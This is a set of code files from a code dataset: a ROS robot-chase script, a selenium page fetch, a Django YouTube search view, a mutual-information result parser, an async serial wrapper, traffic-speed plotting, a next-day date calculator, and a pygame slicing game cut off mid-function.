If so, use additional rules to check for error margin\n # or negative numbers\n turning = False\n if target_yaw == 3.1415 or target_yaw == 0:\n if current_yaw > 0:\n if current_yaw > target_yaw + yaw_error or current_yaw < target_yaw - yaw_error:\n turning = True\n else:\n if current_yaw > -1*(target_yaw) + yaw_error or current_yaw < -1*(target_yaw) - yaw_error:\n turning = True\n else:\n if current_yaw > target_yaw + yaw_error or current_yaw < target_yaw - yaw_error:\n turning = True\n else:\n turning = False\n # Still need to turn, don't move forward yet\n if turning:\n self.forward = False\n command = Twist()\n\n # Check for cases where moving clockwise is better than the default\n # counter clockwise\n if target_yaw == 0 and current_yaw > 0:\n command.angular.z = -0.7\n elif target_yaw == 3.1415 and current_yaw < 0:\n command.angular.z = -0.7\n elif target_yaw == -1.5708 and current_yaw < 1.5708 and current_yaw > -1.5708:\n command.angular.z = -0.7\n else:\n command.angular.z = 0.5\n\n self.command_pub.publish(command)\n\n # Turning has completed, can begin moving forward\n else:\n self.forward = True\n error = 0.1\n command = Twist()\n x_midpoint = self.find_midpoint(target_cell, \"x\")\n y_midpoint = self.find_midpoint(target_cell, \"y\")\n\n # Robot is moving along the x axis, check if it has reached midpoint of next cell\n if target_yaw == 0 or target_yaw == 3.1415:\n axis = 'x'\n if x_midpoint - error < self.RED_POS.x and x_midpoint + error > self.RED_POS.x:\n self.forward = False\n print('stop forward x ' + str(self.RED_POS.x))\n # Robot is moving along the y axis, check if it has reached midpoint of next cell\n else:\n if y_midpoint - error < self.RED_POS.y and y_midpoint + error > self.RED_POS.y:\n self.forward = False\n print('stop forward y ' + str(self.RED_POS.y))\n\n if not self.forward:\n print('stop moving forward')\n command.linear.x = 0\n self.command_pub.publish(command)\n rospy.sleep(1)\n else:\n command.linear.x = 0.3\n self.command_pub.publish(command)\n\n # Determines the coordinate value of the midpoint of a cell for the specificed axis\n # Add 0.5 to get the midpoint of the cell\n def find_midpoint(self, cell, axis):\n if axis==\"x\":\n return cell%MAP_WIDTH + 0.5\n else:\n return math.floor(cell/MAP_WIDTH) + 0.5\n\n # Helper function that translates a point into a cell location\n # on the map (map designed so that each cell is 1m x 1m)\n def determine_cell(self, position : Point):\n column = math.floor(position.x)\n row = math.floor(position.y)\n cell = MAP_WIDTH * row + column\n return cell\n\n # Callback function that extracts ModelState data and calls move() command\n def turtle_hunter(self, data: ModelState):\n # Extract Location of Red Turtle and Pacturtle\n pacturtle_data = Pose()\n pacturtle_cell = 0\n redturtle_data = Pose()\n redturtle_cell = 0\n for turtle in self.init_pos.keys():\n index = data.name.index(turtle)\n if turtle == PACTURTLE:\n pacturtle_data = data.pose[index]\n pacturtle_cell = self.determine_cell(pacturtle_data.position)\n else:\n redturtle_data = data.pose[index]\n redturtle_cell = self.determine_cell(redturtle_data.position)\n self.RED_POS = redturtle_data.position\n self.POSE = redturtle_data\n # Bot at midpoint, calculate new shortest path from current cell\n if not self.forward:\n self.RED_CELL = redturtle_cell\n self.PAC_CELL = pacturtle_cell\n self.shortest_path(self.RED_CELL, self.PAC_CELL)\n self.move()\n # Still moving forward, do not bother it until reaches midpoint of target cell\n else:\n self.move()\n return\n\n def 
run(self):\n rospy.spin()\n\nif __name__ == \"__main__\":\n node = RedTurtle()\n","sub_path":"scripts/red_turtle.py","file_name":"red_turtle.py","file_ext":"py","file_size_in_byte":9976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"230872488","text":"'''\r\nCreated on 2019年3月4日\r\n\r\n@author: Le\r\n'''\r\nfrom selenium import webdriver\r\n\r\ndriver = r\"D:\\Program files\\chromedriver.exe\"\r\nd = webdriver.Chrome(executable_path=driver)\r\nd.get('https://www.taobao.com/')\r\nprint(d.page_source)","sub_path":"spider/selenium1.py","file_name":"selenium1.py","file_ext":"py","file_size_in_byte":234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"557498694","text":"import collections\nimport fileinput\n\n#-----------------------------------------------------------------\n#--------- REAL TIME INPUT VS. FILE INPUT SETTINGS --------------\n# REALTIMEinput = True: Shell waits for user to input next command\n# REALTIMEinput = False: Shell takes in file input and shuts down after processing each line. \n\nREALTIMEinput = False\n#-----------------------------------------------------------------\n# ------ REAL TIME INPUT VS. FILE INPUT SETTINGS END ----------\n#-----------------------------------------------------------------\n\n\n#-----------------------------------------------\n# ------ OUTPUT/PRINT SETTINGS START ----------\n# DEBUG = True: All logs will be shown. \n# DEBUG = False: Only relevant output is shown.\n# ------------------------------------------------\nDEBUG = False\n\ndef log(s):\n '''Used for debugging.'''\n if DEBUG:\n print(s)\n\ndef display(s):\n '''Used for running.'''\n if DEBUG == False:\n print(s, end =\" \")\n#-----------------------------------------------\n# ------ OUTPUT/PRINT SETTINGS END ----------\n#-----------------------------------------------\n\n\n#--------------------------------------------------------\n# ------ FILE INPUT SETTINGS START ----------------------\n# TESTRUN = True: Input file is specified below in the var filepath.\n# TESTRUN = False: Input file is input.txt by default.\nTESTRUN = False\nfilepath = 'io/in_1' # Input for run\n\ndef getInput():\n '''Get input from file input.txt, or file specified in config in case of testrun.'''\n fileInput = collections.deque()\n\n # INPUT FILE PATH SPECIFIED ABOVE ***\n if TESTRUN:\n file1 = open(filepath, 'r')\n lines = file1.readlines()\n \n # INPUT IS DEFAULT INPUT.TXT (if make cmd is used)\n else: \n lines = fileinput.input()\n \n # Create a queue\n for line in lines:\n if line != \"\\n\":\n fileInput.append(line.rstrip())\n\n return fileInput\n\n#--------------------------------------------------------\n# ------ FILE INPUT SETTINGS END ------------------------\n#--------------------------------------------------------\n","sub_path":"Project1/Project1_handin_eythorb19/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"175979386","text":"from django.shortcuts import render, redirect\nimport requests\nfrom django.conf import settings\nfrom isodate import parse_duration\n\n# Create your views here.\n\ndef index(request):\n link = 'https://www.googleapis.com/youtube/v3/search/'\n videos = 'https://www.googleapis.com/youtube/v3/videos/'\n\n search_args = {\n 'part' : 'snippet',\n 'q' : request.POST['search'],\n 'key' : settings.YOUTUBE_DATA_API_KEY,\n 'max results' : 30,\n 
'type' : 'video'\n }\n\n query = requests.get(link, params=search_args)\n\n results = query.json()['items']\n\n video_list = []\n for result in results:\n video_list.append(result['id']['videoId'])\n \n video_args = {\n 'key' : settings.YOUTUBE_DATA_API_KEY,\n 'part' : 'snippet,contentDetails',\n 'id' : ','.join(video_list),\n 'maxResults' : 30\n }\n\n query = requests.get(videos, params=video_args)\n\n results = query.json()['items']\n\n video_results = []\n for result in results:\n video_item = {\n 'title' : result['snippet']['title'],\n 'id' : result['id'],\n 'url' : f'https://www.youtube.com/watch?v={ result[\"id\"] }',\n 'duration' : int(parse_duration(result['contentDetails']['duration']).total_seconds()),\n 'thumbnail' : result['snippet']['thumbnails']['high']['url']\n }\n video_results.append(video_item)\n \n context = {\n 'videos' : video_results\n }\n\n return render(request, 'search/results.html', context)\n","sub_path":"youtube_search/search/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"554728035","text":"#coding:utf-8\n\"\"\"\n:param 调用窗口,加写代码,实现代码与窗口分离\n\"\"\"\n\nfrom qt04 import Ui_MainWindow # 导入生成form.py里生成的类\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nimport sys\n\nclass mywindow(QtWidgets.QMainWindow, Ui_MainWindow):\n def __init__(self):\n super(mywindow, self).__init__() #执行父类\n self.new = Ui_MainWindow()\n self.new.setupUi(self)\n\n\nif __name__ == \"__main__\":\n app = QtWidgets.QApplication(sys.argv)\n myshow = mywindow()\n myshow.show()\n sys.exit(app.exec_())","sub_path":"qt/qt01/qt04_main2.py","file_name":"qt04_main2.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"77965252","text":"#\n# Copyright (c) 2010-2016, MIT Probabilistic Computing Project\n#\n# Lead Developers: Dan Lovell and Jay Baxter\n# Authors: Dan Lovell, Baxter Eaves, Jay Baxter, Vikash Mansinghka\n# Research Leads: Vikash Mansinghka, Patrick Shafto\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\nimport numpy\nimport csv\nimport os\nimport ast\nimport pickle\n\nimport crosscat.utils.inference_utils as iu\nimport crosscat.utils.xnet_utils as xu\n\nimport pdb\n\ndef is_hadoop_file(filename):\n\tname, extension = os.path.splitext(filename)\n\tif extension == '.gz':\n\t\treturn True\n\telse:\n\t\treturn False\n\ndef parse_line(test, mi, linfoot):\n\tindex = test['id']\n\tnum_rows = test['num_rows']\n\tnum_cols = test['num_cols']\n\tnum_views = test['num_views']\n\tnum_clusters = test['num_clusters']\n\tcorr = test['corr']\n\t\n\trow = [index, num_rows, num_cols, num_views, num_clusters, corr, mi, linfoot]\n\n\treturn row\n\ndef hadoop_to_dict_generator(test_key_file_object):\n\t# return read cursor to the start (or this generator cannot be called again)\n\ttest_key_file_object.seek(0)\n\tfor line in test_key_file_object:\n\t\tdict_line = xu.parse_hadoop_line(line)\n\t\tyield dict_line\n\t\ndef 
parse_data_to_csv(test_key_filename, params_dict, n_tests, output_filename):\n\t# open input file and convert to list of dicts\n\ttest_key_file_object = open(test_key_filename, 'rb')\n\tinput_lines = hadoop_to_dict_generator(test_key_file_object)\n\n\t# open output file and convert to list of dicts\n\toutput_file_object = open(output_filename, 'rb')\n\tresults = hadoop_to_dict_generator(output_file_object)\n\t\n\tn_datasets = params_dict['n_datasets']\n\tn_samples = params_dict['n_samples']\n\n\theader = ['id', 'num_rows', 'num_cols', 'num_views', 'num_clusters', 'corr','MI','Linfoot']\n\n\t# data_mi = [[[0] for i in range(n_datasets)] for i in range(n_tests)]\n\t# data_linfoot = [[[0] for i in range(n_datasets)] for i in range(n_tests)]\n\t# counts = [[[0] for i in range(n_datasets)] for i in range(n_tests)]\n\n\tdata_mi = [0.0]*n_tests\n\tdata_linfoot = [0.0]*n_tests\n\tcounts = [0.0]*n_tests\n\n\n\tfor result in results:\n\t\tres = result[1] # because it's a tuple with an id at index 0\n\t\ttest_idx = res['id']\n\t\ttest_dataset = res['dataset']\n\t\ttest_sample = res['sample']\n\t\t\n\t\tdata_mi[test_idx] += float(res['mi']) \n\t\tdata_linfoot[test_idx] += float(iu.mutual_information_to_linfoot(res['mi']))\n\t\tcounts[test_idx] += 1.0\n\t\n\tfor test_ids in range(n_tests):\n\t\tdata_mi[test_idx] /= counts[test_idx]\n\t\tdata_linfoot[test_idx] /= counts[test_idx]\n\n\t# # calculate the mean over samples\n\t# for test in range(n_tests):\n\t\t\n\t# \tfor dataset in range(n_datasets):\n\t# \t\ttry:\n\t# \t\t\tdata_mi[test][dataset] = numpy.array(data_mi[test][dataset],dtype=float)\n\t# \t\texcept ValueError:\n\t# \t\t\tpdb.set_trace()\n\n\t# \t\ttry:\n\t# \t\t\tdata_mi[test][dataset] = numpy.mean(data_mi[test][dataset],axis=0)\n\t# \t\texcept TypeError:\n\t# \t\t\tpdb.set_trace()\n\n\t# \t\tdata_linfoot[test][dataset] = mi_to_linfoot(data_mi[test][dataset])\n\n\t# \t\tdata_mi[test][dataset] = numpy.mean(data_mi[test][dataset])\n\t# \t\tdata_linfoot[test][dataset] = numpy.mean(data_linfoot[test][dataset])\n\n\t# \t# now calculate the mean over datasets\n\t# \tdata_mi[test] = numpy.mean(numpy.array(data_mi[test]))\n\t# \tdata_linfoot[test] = numpy.mean(numpy.array(data_linfoot[test]))\n\t\n\tname, extension = os.path.splitext(output_filename)\n\n\toutfile = name + '.csv'\n\n\twith open(outfile,'w') as csvfile:\n\t\tcsvwriter = csv.writer(csvfile,delimiter=',')\n\t\tcsvwriter.writerow(header)\n\t\tcurrent_idx = -1\n\t\tfor test in input_lines:\n\t\t\tres = test[1]\n\t\t\ttest_idx = res['id']\n\t\t\tif test_idx != current_idx:\n\t\t\t\tcurrent_idx = test_idx\n\t\t\t\tline = parse_line(res, data_mi[test_idx], data_linfoot[test_idx])\n\t\t\t\tcsvwriter.writerow(line)\n\ndef mi_to_linfoot(mi):\n\t#\n\t# linfoot = numpy.zeros(mi.shape)\n\t# if len(mi.shape) == 1:\n\t# \tfor entry in range(mi.size):\n\t# \t\tlinfoot[entry] = iu.mutual_information_to_linfoot(mi[entry])\n\t# else:\n\t# \tfor r in range(mi.shape[0]):\n\t# \t\tfor c in range(mi.shape[1]):\n\t# \t\t\tlinfoot[r,c] = iu.mutual_information_to_linfoot(mi[r,c])\n\n\n\t# return linfoot\n\treturn [iu.mutual_information_to_linfoot(m) for m in mi]\n\nif __name__ == \"__main__\":\n\n\timport argparse\n\tparser = argparse.ArgumentParser()\n\n\tparser.add_argument('--key_filename', type=str)\n\tparser.add_argument('--params_filename', type=str)\n\tparser.add_argument('--n_tests', type=int)\n\tparser.add_argument('--output_filename', type=str)\n\n\targs = parser.parse_args()\n\n\tkey_filename = args.key_filename\n\toutput_filename = 
args.output_filename\n\tn_tests = args.n_tests\n\tparams_filename = args.params_filename\n\tparams_dict = pickle.load( open( params_filename, \"rb\" ))\n\n\n\n\tparse_data_to_csv(key_filename, params_dict, n_tests, output_filename)\n\n","sub_path":"src/tests/mi_tests/parse_mi.py","file_name":"parse_mi.py","file_ext":"py","file_size_in_byte":5156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"214209245","text":"import asyncio\nimport os\nimport serial\n\n\n__all__ = [\"AsyncSerial\"]\n\n\nclass AsyncSerialBase:\n def __init__(self, *args, loop=None, **kwargs):\n self.ser = serial.serial_for_url(*args, **kwargs)\n\n if loop is None:\n loop = asyncio.get_event_loop()\n self._loop = loop\n\n self.read_future = None\n self.write_future = None\n\n def __enter__(self):\n return self\n\n def __exit__(self, exc_type, exc_value, traceback):\n self.close()\n\n async def read_exactly(self, n):\n data = bytearray()\n while len(data) < n:\n remaining = n - len(data)\n data += await self.read(remaining)\n return data\n\n async def write_exactly(self, data):\n while data:\n res = await self.write(data)\n data = data[res:]\n\n\nif os.name != \"nt\":\n class AsyncSerial(AsyncSerialBase):\n def fileno(self):\n return self.ser.fd\n\n def _read_ready(self, n):\n self._loop.remove_reader(self.fileno())\n if not self.read_future.cancelled():\n try:\n res = os.read(self.fileno(), n)\n except Exception as exc:\n self.read_future.set_exception(exc)\n else:\n self.read_future.set_result(res)\n self.read_future = None\n\n def read(self, n):\n assert self.read_future is None or self.read_future.cancelled()\n future = asyncio.Future(loop=self._loop)\n\n if n == 0:\n future.set_result(b\"\")\n else:\n try:\n res = os.read(self.fileno(), n)\n except Exception as exc:\n future.set_exception(exc)\n else:\n if res:\n future.set_result(res)\n else:\n self.read_future = future\n self._loop.add_reader(self.fileno(),\n self._read_ready, n)\n\n return future\n\n def _write_ready(self, data):\n self._loop.remove_writer(self.fileno())\n if not self.write_future.cancelled():\n try:\n res = os.write(self.fileno(), data)\n except Exception as exc:\n self.write_future.set_exception(exc)\n else:\n self.write_future.set_result(res)\n self.write_future = None\n\n def write(self, data):\n assert self.write_future is None or self.write_future.cancelled()\n future = asyncio.Future(loop=self._loop)\n\n if len(data) == 0:\n future.set_result(0)\n else:\n try:\n res = os.write(self.fileno(), data)\n except BlockingIOError:\n self.write_future = future\n self._loop.add_writer(self.fileno(),\n self._write_ready, data)\n except Exception as exc:\n future.set_exception(exc)\n else:\n future.set_result(res)\n\n return future\n\n def close(self):\n if self.read_future is not None:\n self._loop.remove_reader(self.fileno())\n if self.write_future is not None:\n self._loop.remove_writer(self.fileno())\n self.ser.close()\n\nelse:\n class AsyncSerial(AsyncSerialBase):\n \"\"\"Requires ProactorEventLoop\"\"\"\n def fileno(self):\n return self.ser._port_handle\n\n def read(self, n):\n return self._loop._proactor.recv(self.fileno(), n)\n\n def write(self, data):\n return self._loop._proactor.send(self.fileno(), data)\n\n def close(self):\n self.ser.close()\n","sub_path":"serial/aio.py","file_name":"aio.py","file_ext":"py","file_size_in_byte":3886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"535645427","text":"########## Select correct 
directory\nimport os\nimport numpy as np\nimport pandas as pd\nimport plotly.plotly as py\nimport plotly.offline as po\nimport plotly.graph_objs as go\n\n#### Example: Restrict to just April\n#df = df.loc[lambda df: df['Month'] == 4]\n\n########## Example: AGGREGATE 5-minute speeds and GROUP BY month, day, ap\n#agg1 = {'speed' : {'avgSpeed' : 'mean'}}\n#df15 = df.groupby(['tmc_code','Date','ap'], as_index=False).agg(agg1, as_index=False)\n#pdf = df15[['tmc_code', 'tstamp', 'speed']]\n#pdf.to_csv('I4_P_15min_Apr.csv', index=False)\n\ndef extract_vals(date_str):\n is_approx = False\n date, time, ampm = date_str.split(' ')\n hour, minute, second = time.split(':')\n \n if ampm.endswith('*'): # Check if is approximated (has an *) and remove '*'\n is_approx = True\n ampm = ampm[:2]\n\n is_pm = ampm.lower() == 'pm'\n ap = (int(hour) % 12) * 4 + int(minute) // 15 + (48 if is_pm else 0)\n return date, ap, is_approx\n\ndef create_columns(data):\n dates, aps, is_approxs = zip(*data)\n return list(dates), list(aps), list(is_approxs)\n\ndef percentile(n):\n def percentile_(x):\n return np.percentile(x,n)\n percentile_.__name__='percentile_%s' % n\n return percentile_\n\n########## Changing to the correct directory\nos.chdir('C:\\\\Users\\ltrask\\Documents\\BlueMac Data') \n\n########## Load 5-minute csv into pandas dataframe\nnumLinesToSkip = 0\nf = open('DIGI145_to_DIGI157.csv', 'r')\nfor line in f:\n tokens = line.split(',')\n if tokens[0] == \"Start Time\":\n break\n numLinesToSkip+=1\n\ndf = pd.read_csv('DIGI145_to_DIGI157.csv', skiprows=numLinesToSkip)\n#df['Date'] = [dStr.split(' ')[0] for dStr in df['Start Time']]\n#df['AP'] = [extract_ap_from_time(dStr) for dStr in df['Start Time']]\ndf['Date'], df['AP'], df['is_approx'] = create_columns([extract_vals(dStr) for dStr in df['Start Time']])\n\n######### Aggregating for RL Data\napGroup = df.groupby(['AP'])\nspeedCol = apGroup['Average Speed(mph)']\ndfRL=speedCol.agg([np.mean, percentile(95), percentile(5)])\n\ntimeStamps = ['2000-01-01 ' +str(apIdx // 4)+':'+str((apIdx % 4)*15)+':00' for apIdx in dfRL.index]\n\ndata = [\n go.Scatter(\n x=timeStamps, \n y=dfRL['mean'],\n fill = 'tonexty',\n fillcolor = '#B0C4DE',\n line=dict(color='rgb(205,92,92)'),\n name='Average'\n ),\n go.Scatter(\n x=timeStamps, \n y=dfRL['percentile_95'],\n line=dict(color='rgb(176,196,222)'),\n fillcolor = '#B0C4DE',\n fill = 'tonexty',\n name='95th Percentile'\n ),\n go.Scatter(\n x=timeStamps, \n y=dfRL['percentile_5'],\n fillcolor = '#FFFFFF',\n fill = 'tozeroy',\n line=dict(color='rgb(176,196,222)'),\n name='5th Percentile'\n )\n]\n\nlayout = go.Layout(\n title='Average Speed Across All Days',\n yaxis=dict(title='Speed (mph)'),\n xaxis=dict(title='Analysis Period', tickformat=\"%I:%M%p\")\n)\n\nfig = go.Figure(data=data, layout=layout)\n\npo.init_notebook_mode()\npo.iplot(fig, filename='stacked-area')\n\n","sub_path":"speed_agg.py","file_name":"speed_agg.py","file_ext":"py","file_size_in_byte":3022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"325688480","text":"\"\"\"\nTarea: Siguiente día\nAutor: \nFecha: 25/mar/20\nGrupo: ESI-232\nProfesor: Jorge A. 
Zaldívar Carrillo\nDescripción:\n\"\"\"\n\n# Declaraciones\ndef es_bisiesto(anho):\n \"Determina si el año es bisiesto\"\n if anho % 400 == 0 or anho % 4 == 0 and anho % 100 != 0:\n bisiesto = True\n else:\n bisiesto = False\n return bisiesto\n\n\ndef dias_del_mes(mes, anho):\n \"Calcula los días que tiene un mes\"\n if mes in [1, 3, 5, 7, 8, 10, 12]:\n dias = 31\n elif mes in [4, 6, 9, 11]:\n dias = 30\n else:\n if es_bisiesto(anho):\n dias = 29\n else:\n dias = 28\n return dias\n\n\n# Programa principal\ndef main():\n # Entradas\n dia = int(input(\"Día: \"))\n mes = int(input(\"Mes: \"))\n anho = int(input(\"Año: \"))\n\n # Proceso\n dia += 1\n if dia > dias_del_mes(mes, anho):\n dia = 1\n mes += 1\n if mes > 12:\n mes = 1\n anho += 1\n\n # Salidas\n print()\n print(\"Día:\", dia)\n print(\"Mes:\", mes)\n print(\"Año: \", anho)\n\n\nif __name__ == \"__main__\":\n main()","sub_path":"dia_siguiente.py","file_name":"dia_siguiente.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"643888397","text":"import math\nfrom random import randint\n\nfrom pygame.locals import *\nimport pygame\nimport sys\nfrom pygame.locals import *\n\npygame.init()\n\n# Constants\nwindowWidth = 500\nwindowHeight = 500\n\n# Surface\nfactor = 5\nDISPLAYSURF = pygame.display.set_mode((windowWidth, windowHeight), pygame.RESIZABLE)\nsurfaceRect = DISPLAYSURF.get_rect()\npygame.display.set_caption('Root Ninja')\n\n# Time\nFPS = 160\nFPSCLOCK = pygame.time.Clock()\n\n# Colors\n\nRED = (255, 0, 0)\nBLACK = (0, 0, 0)\nGREY = (128, 128, 128)\n\n# Global Variables\n\nisFast = False\n\nopenScreenRects = [] # stores rectangles of the opening screen\ngameStarted = False # when is gameStarted is False, start screen appears\ngameScreenRect = None\n\nresizeGameScreenRect = None\noldFactorLength = 1\n\nrootGroup = pygame.sprite.Group()\n\nscore = 0\nlivesLeft = 3\n\n# CLASSES\n\nclass Fruit(pygame.sprite.Sprite):\n def __init__(self, images, startPosAdd, vertexPosAdd, isBomb):\n pygame.sprite.Sprite.__init__(self)\n global resizeGameScreenRect\n\n self.images = images # the fruit images, an array with animation images in order, last image is explode img\n self.image = images[0] # self.image is from the Sprite class\n self.imgIndex = 0\n self.rect = self.image.get_rect() # from the Sprite class\n self.curPosAddX, self.curPosAddY = startPosAdd\n self.vertexPosAddX, self.vertexPosAddY = vertexPosAdd\n self.startXPos, self.startYPos = gameScreenRect.left + self.curPosAddX, gameScreenRect.top + self.curPosAddY\n self.vertexXPos, self.vertexYPos = gameScreenRect.left + vertexPosAdd[0], gameScreenRect.top + vertexPosAdd[1]\n self.curPosX, self.curPosY = self.startXPos, self.startYPos\n self.reachedVertex = False\n self.speedX, self.speedY = 5, -5\n self.setNewSpeed()\n self.movesDone = 0\n self.sliceImgTime = 0\n self.hasBeenSliced = False\n self.withCombo = False # boolean that means if False then the Fruit isn't to be added to the combo num\n self.image = self.images[self.imgIndex]\n self.isBomb = isBomb\n self.lostPoints = 0\n\n self.resizeImg(resizeGameScreenRect, True)\n\n self.image = self.images[self.imgIndex]\n self.setImgPos()\n\n self.mask = pygame.mask.from_surface(self.image)\n\n def setMask(self):\n self.mask = pygame.mask.from_surface(self.image)\n\n def checkHasBeenSliced(self):\n global score, isFast\n\n if self.hasBeenSliced == True:\n if self.sliceImgTime == 0 and self.isBomb == False:\n score += 10\n if isFast == True:\n 
self.withCombo = True\n\n if self.sliceImgTime == 0 and self.isBomb == True:\n if score < 10:\n self.lostPoints = score\n score = 0\n elif score >= 10:\n self.lostPoints = 10\n score -= 10\n\n self.image = self.images[4]\n self.sliceImgTime += 1;\n\n if self.isBomb == True and self.sliceImgTime <= 6:\n openingFONT = pygame.font.SysFont('chiller', int(gameScreenRect.w / 480 * 50))\n textSurface = openingFONT.render('--- ' + str(self.lostPoints), True, BLACK, GREY)\n textRect = textSurface.get_rect()\n textRect.topleft = (self.curPosX+self.rect.w/2, self.curPosY)\n DISPLAYSURF.blit(textSurface, textRect)\n\n def checkShouldRemoveRoot(self): # returns true means remove fruit\n if self.hasBeenSliced == True and self.sliceImgTime >= 15:\n #pointSpriteGroup.add()\n return True\n elif self.curPosX < 0 or self.curPosX > windowWidth or self.curPosY < 0 or self.curPosY > windowHeight:\n return True\n else:\n return False\n\n def setImgPos(self):\n self.rect.center = int(self.curPosX), int(self.curPosY)\n\n def setNewSpeed(self):\n self.endXPos, self.endYPos = 0, 0\n if self.vertexXPos - self.startXPos >= 0:\n self.endXPos, self.endYPos = self.startXPos + int(2 * (self.vertexXPos - self.startXPos)), self.startYPos\n else:\n self.endXPos, self.endYPos = self.startXPos - int(2 * (self.startXPos - self.vertexXPos)), self.startYPos\n\n xDif = self.vertexXPos - self.startXPos\n yDif = self.vertexYPos - self.startYPos\n\n if self.curPosY <= self.vertexYPos or self.reachedVertex == True:\n self.reachedVertex = True\n xDif = self.endXPos - self.vertexXPos\n yDif = self.endYPos - self.vertexYPos\n\n slantLength = math.sqrt(xDif*xDif + yDif*yDif)\n\n factor = gameScreenRect.w / 480\n\n self.speedX = xDif * (40*factor/slantLength)\n self.speedY = yDif * (40*factor/slantLength)\n\n\n def moveFruit(self): # each time the fruit moves a certain distance, the image should change so the fruit is rotating\n self.movesDone += 1\n\n self.setNewSpeed()\n\n if self.imgIndex == 3:\n self.imgIndex = 0\n else:\n self.imgIndex += 1\n\n if self.movesDone >= 3:\n if not self.imgIndex == 3:\n self.movesDone = 0\n self.image = self.images[self.imgIndex + 1]\n\n self.image = self.images[self.imgIndex]\n self.curPosX, self.curPosY = self.curPosX + self.speedX, self.curPosY + self.speedY\n self.setImgPos()\n self.setMask()\n self.checkHasBeenSliced()\n # add more\n\n def resizeImg(self, oldGameScreenRect, isSpawn): # resize image to screen size dimensions\n global resizeGameScreenRect, oldFactorLength\n\n if oldGameScreenRect:\n factorLengthX = gameScreenRect.w / oldGameScreenRect.w\n factorLengthY = gameScreenRect.h / oldGameScreenRect.h\n factorLength = factorLengthX\n\n if factorLengthX < factorLengthY:\n factorLength = factorLengthX\n else:\n factorLength = factorLengthY\n\n resizeGameScreenRect = oldGameScreenRect\n oldFactorLength = factorLength\n\n if isSpawn == True:\n factorLength = gameScreenRect.w/480\n\n for i, img in enumerate(self.images):\n curW, curH = img.get_rect().w, img.get_rect().h\n self.images[i] = pygame.transform.smoothscale(img, (int(curW * factorLength), int(curH * factorLength)))\n\n self.image = self.images[self.imgIndex]\n self.setImgPos()\n\n# GLOBAL METHODS\n\ndef drawXLives():\n global livesLeft\n blackImg = pygame.image.load('BlackX.png')\n redImg = pygame.image.load('RedX.png')\n rect = blackImg.get_rect()\n black = pygame.transform.smoothscale(blackImg, (int(rect.w * gameScreenRect.w/480), int(rect.h * gameScreenRect.w/480)))\n red = pygame.transform.smoothscale(redImg, (int(rect.w * 
gameScreenRect.w/480), int(rect.h * gameScreenRect.w/480)))\n x1, x2, x3 = black, black, black\n if livesLeft <= 2:\n x1 = red\n if livesLeft <= 1:\n x2 = red\n if livesLeft <= 0:\n x3 = red\n\n rect = black.get_rect()\n\n rect.center = (int(windowWidth / 2 + rect.w + 10), int(gameScreenRect.top + gameScreenRect.h / 12))\n DISPLAYSURF.blit(x1, rect)\n rect.center = (int(windowWidth / 2 + rect.w*2 + 10), int(gameScreenRect.top + gameScreenRect.h / 12))\n DISPLAYSURF.blit(x2, rect)\n rect.center = (int(windowWidth / 2 + rect.w*3 + 10), int(gameScreenRect.top + gameScreenRect.h / 12))\n DISPLAYSURF.blit(x3, rect)\n\ndef checkComboPoints():\n global score, rootGroup\n\n numCombos = 0\n for root in rootGroup:\n if root.withCombo == True:\n numCombos += 1\n root.withCombo = False\n posX, posY = root.curPosX + root.rect.w/2, root.curPosY\n\n if numCombos > 1:\n score += numCombos\n openingFONT = pygame.font.SysFont('chiller', int(gameScreenRect.w / 480 * 50))\n textSurface = openingFONT.render('+++ ' + str(numCombos), True, BLACK, GREY)\n textRect = textSurface.get_rect()\n textRect.center = (posX, posY)\n DISPLAYSURF.blit(textSurface, textRect)\n\ndef drawScore():\n global score\n openingFONT = pygame.font.SysFont('chiller', int(gameScreenRect.w/480 * 30))\n textSurface = openingFONT.render('Score: ' + str(score), True, BLACK, GREY)\n textRect = textSurface.get_rect()\n textRect.center = (int(windowWidth / 2), int(windowHeight / 12))\n DISPLAYSURF.blit(textSurface, textRect)\n\ndef getLinePoints(initPosX, initPosY, curPosX, curPosY):\n linePointAry = []\n #y=(Ay-By)/(Ax-Bx)*(x-Ax)+Ay\n\n start, end = None, None\n\n if initPosX >= curPosX:\n start = curPosX\n end = initPosX\n else:\n start = initPosX\n end = curPosX\n for x in range(start, end+1):\n if not initPosX-curPosX == 0:\n y = (initPosY-curPosY)/(initPosX-curPosX) * (x - initPosX) + initPosY\n linePointAry.append((x, y))\n\n return linePointAry\n\ndef checkMouseRootCollide(initPosX, initPosY, curPos):\n global rootGroup\n curPosX, curPosY = curPos\n for root in rootGroup:\n linePointAry = getLinePoints(initPosX, initPosY, curPosX, curPosY)\n\n for point in linePointAry:\n pointX, pointY = point\n\n if root.rect.collidepoint((pointX, pointY)):\n root.hasBeenSliced = True\n print(\"poo\")\n\n\ndef getSlicedRoots(lineRect, collidedRoots):\n for cRoot in collidedRoots:\n collidePoint = pygame.sprite.collide_mask(lineRect, cRoot)\n cRoot.hasBeenSliced = True\n\ndef drawBlackOutsideOfGSR(): # GSR = gameScreenRect\n right = gameScreenRect.right\n bottom = gameScreenRect.bottom\n\n 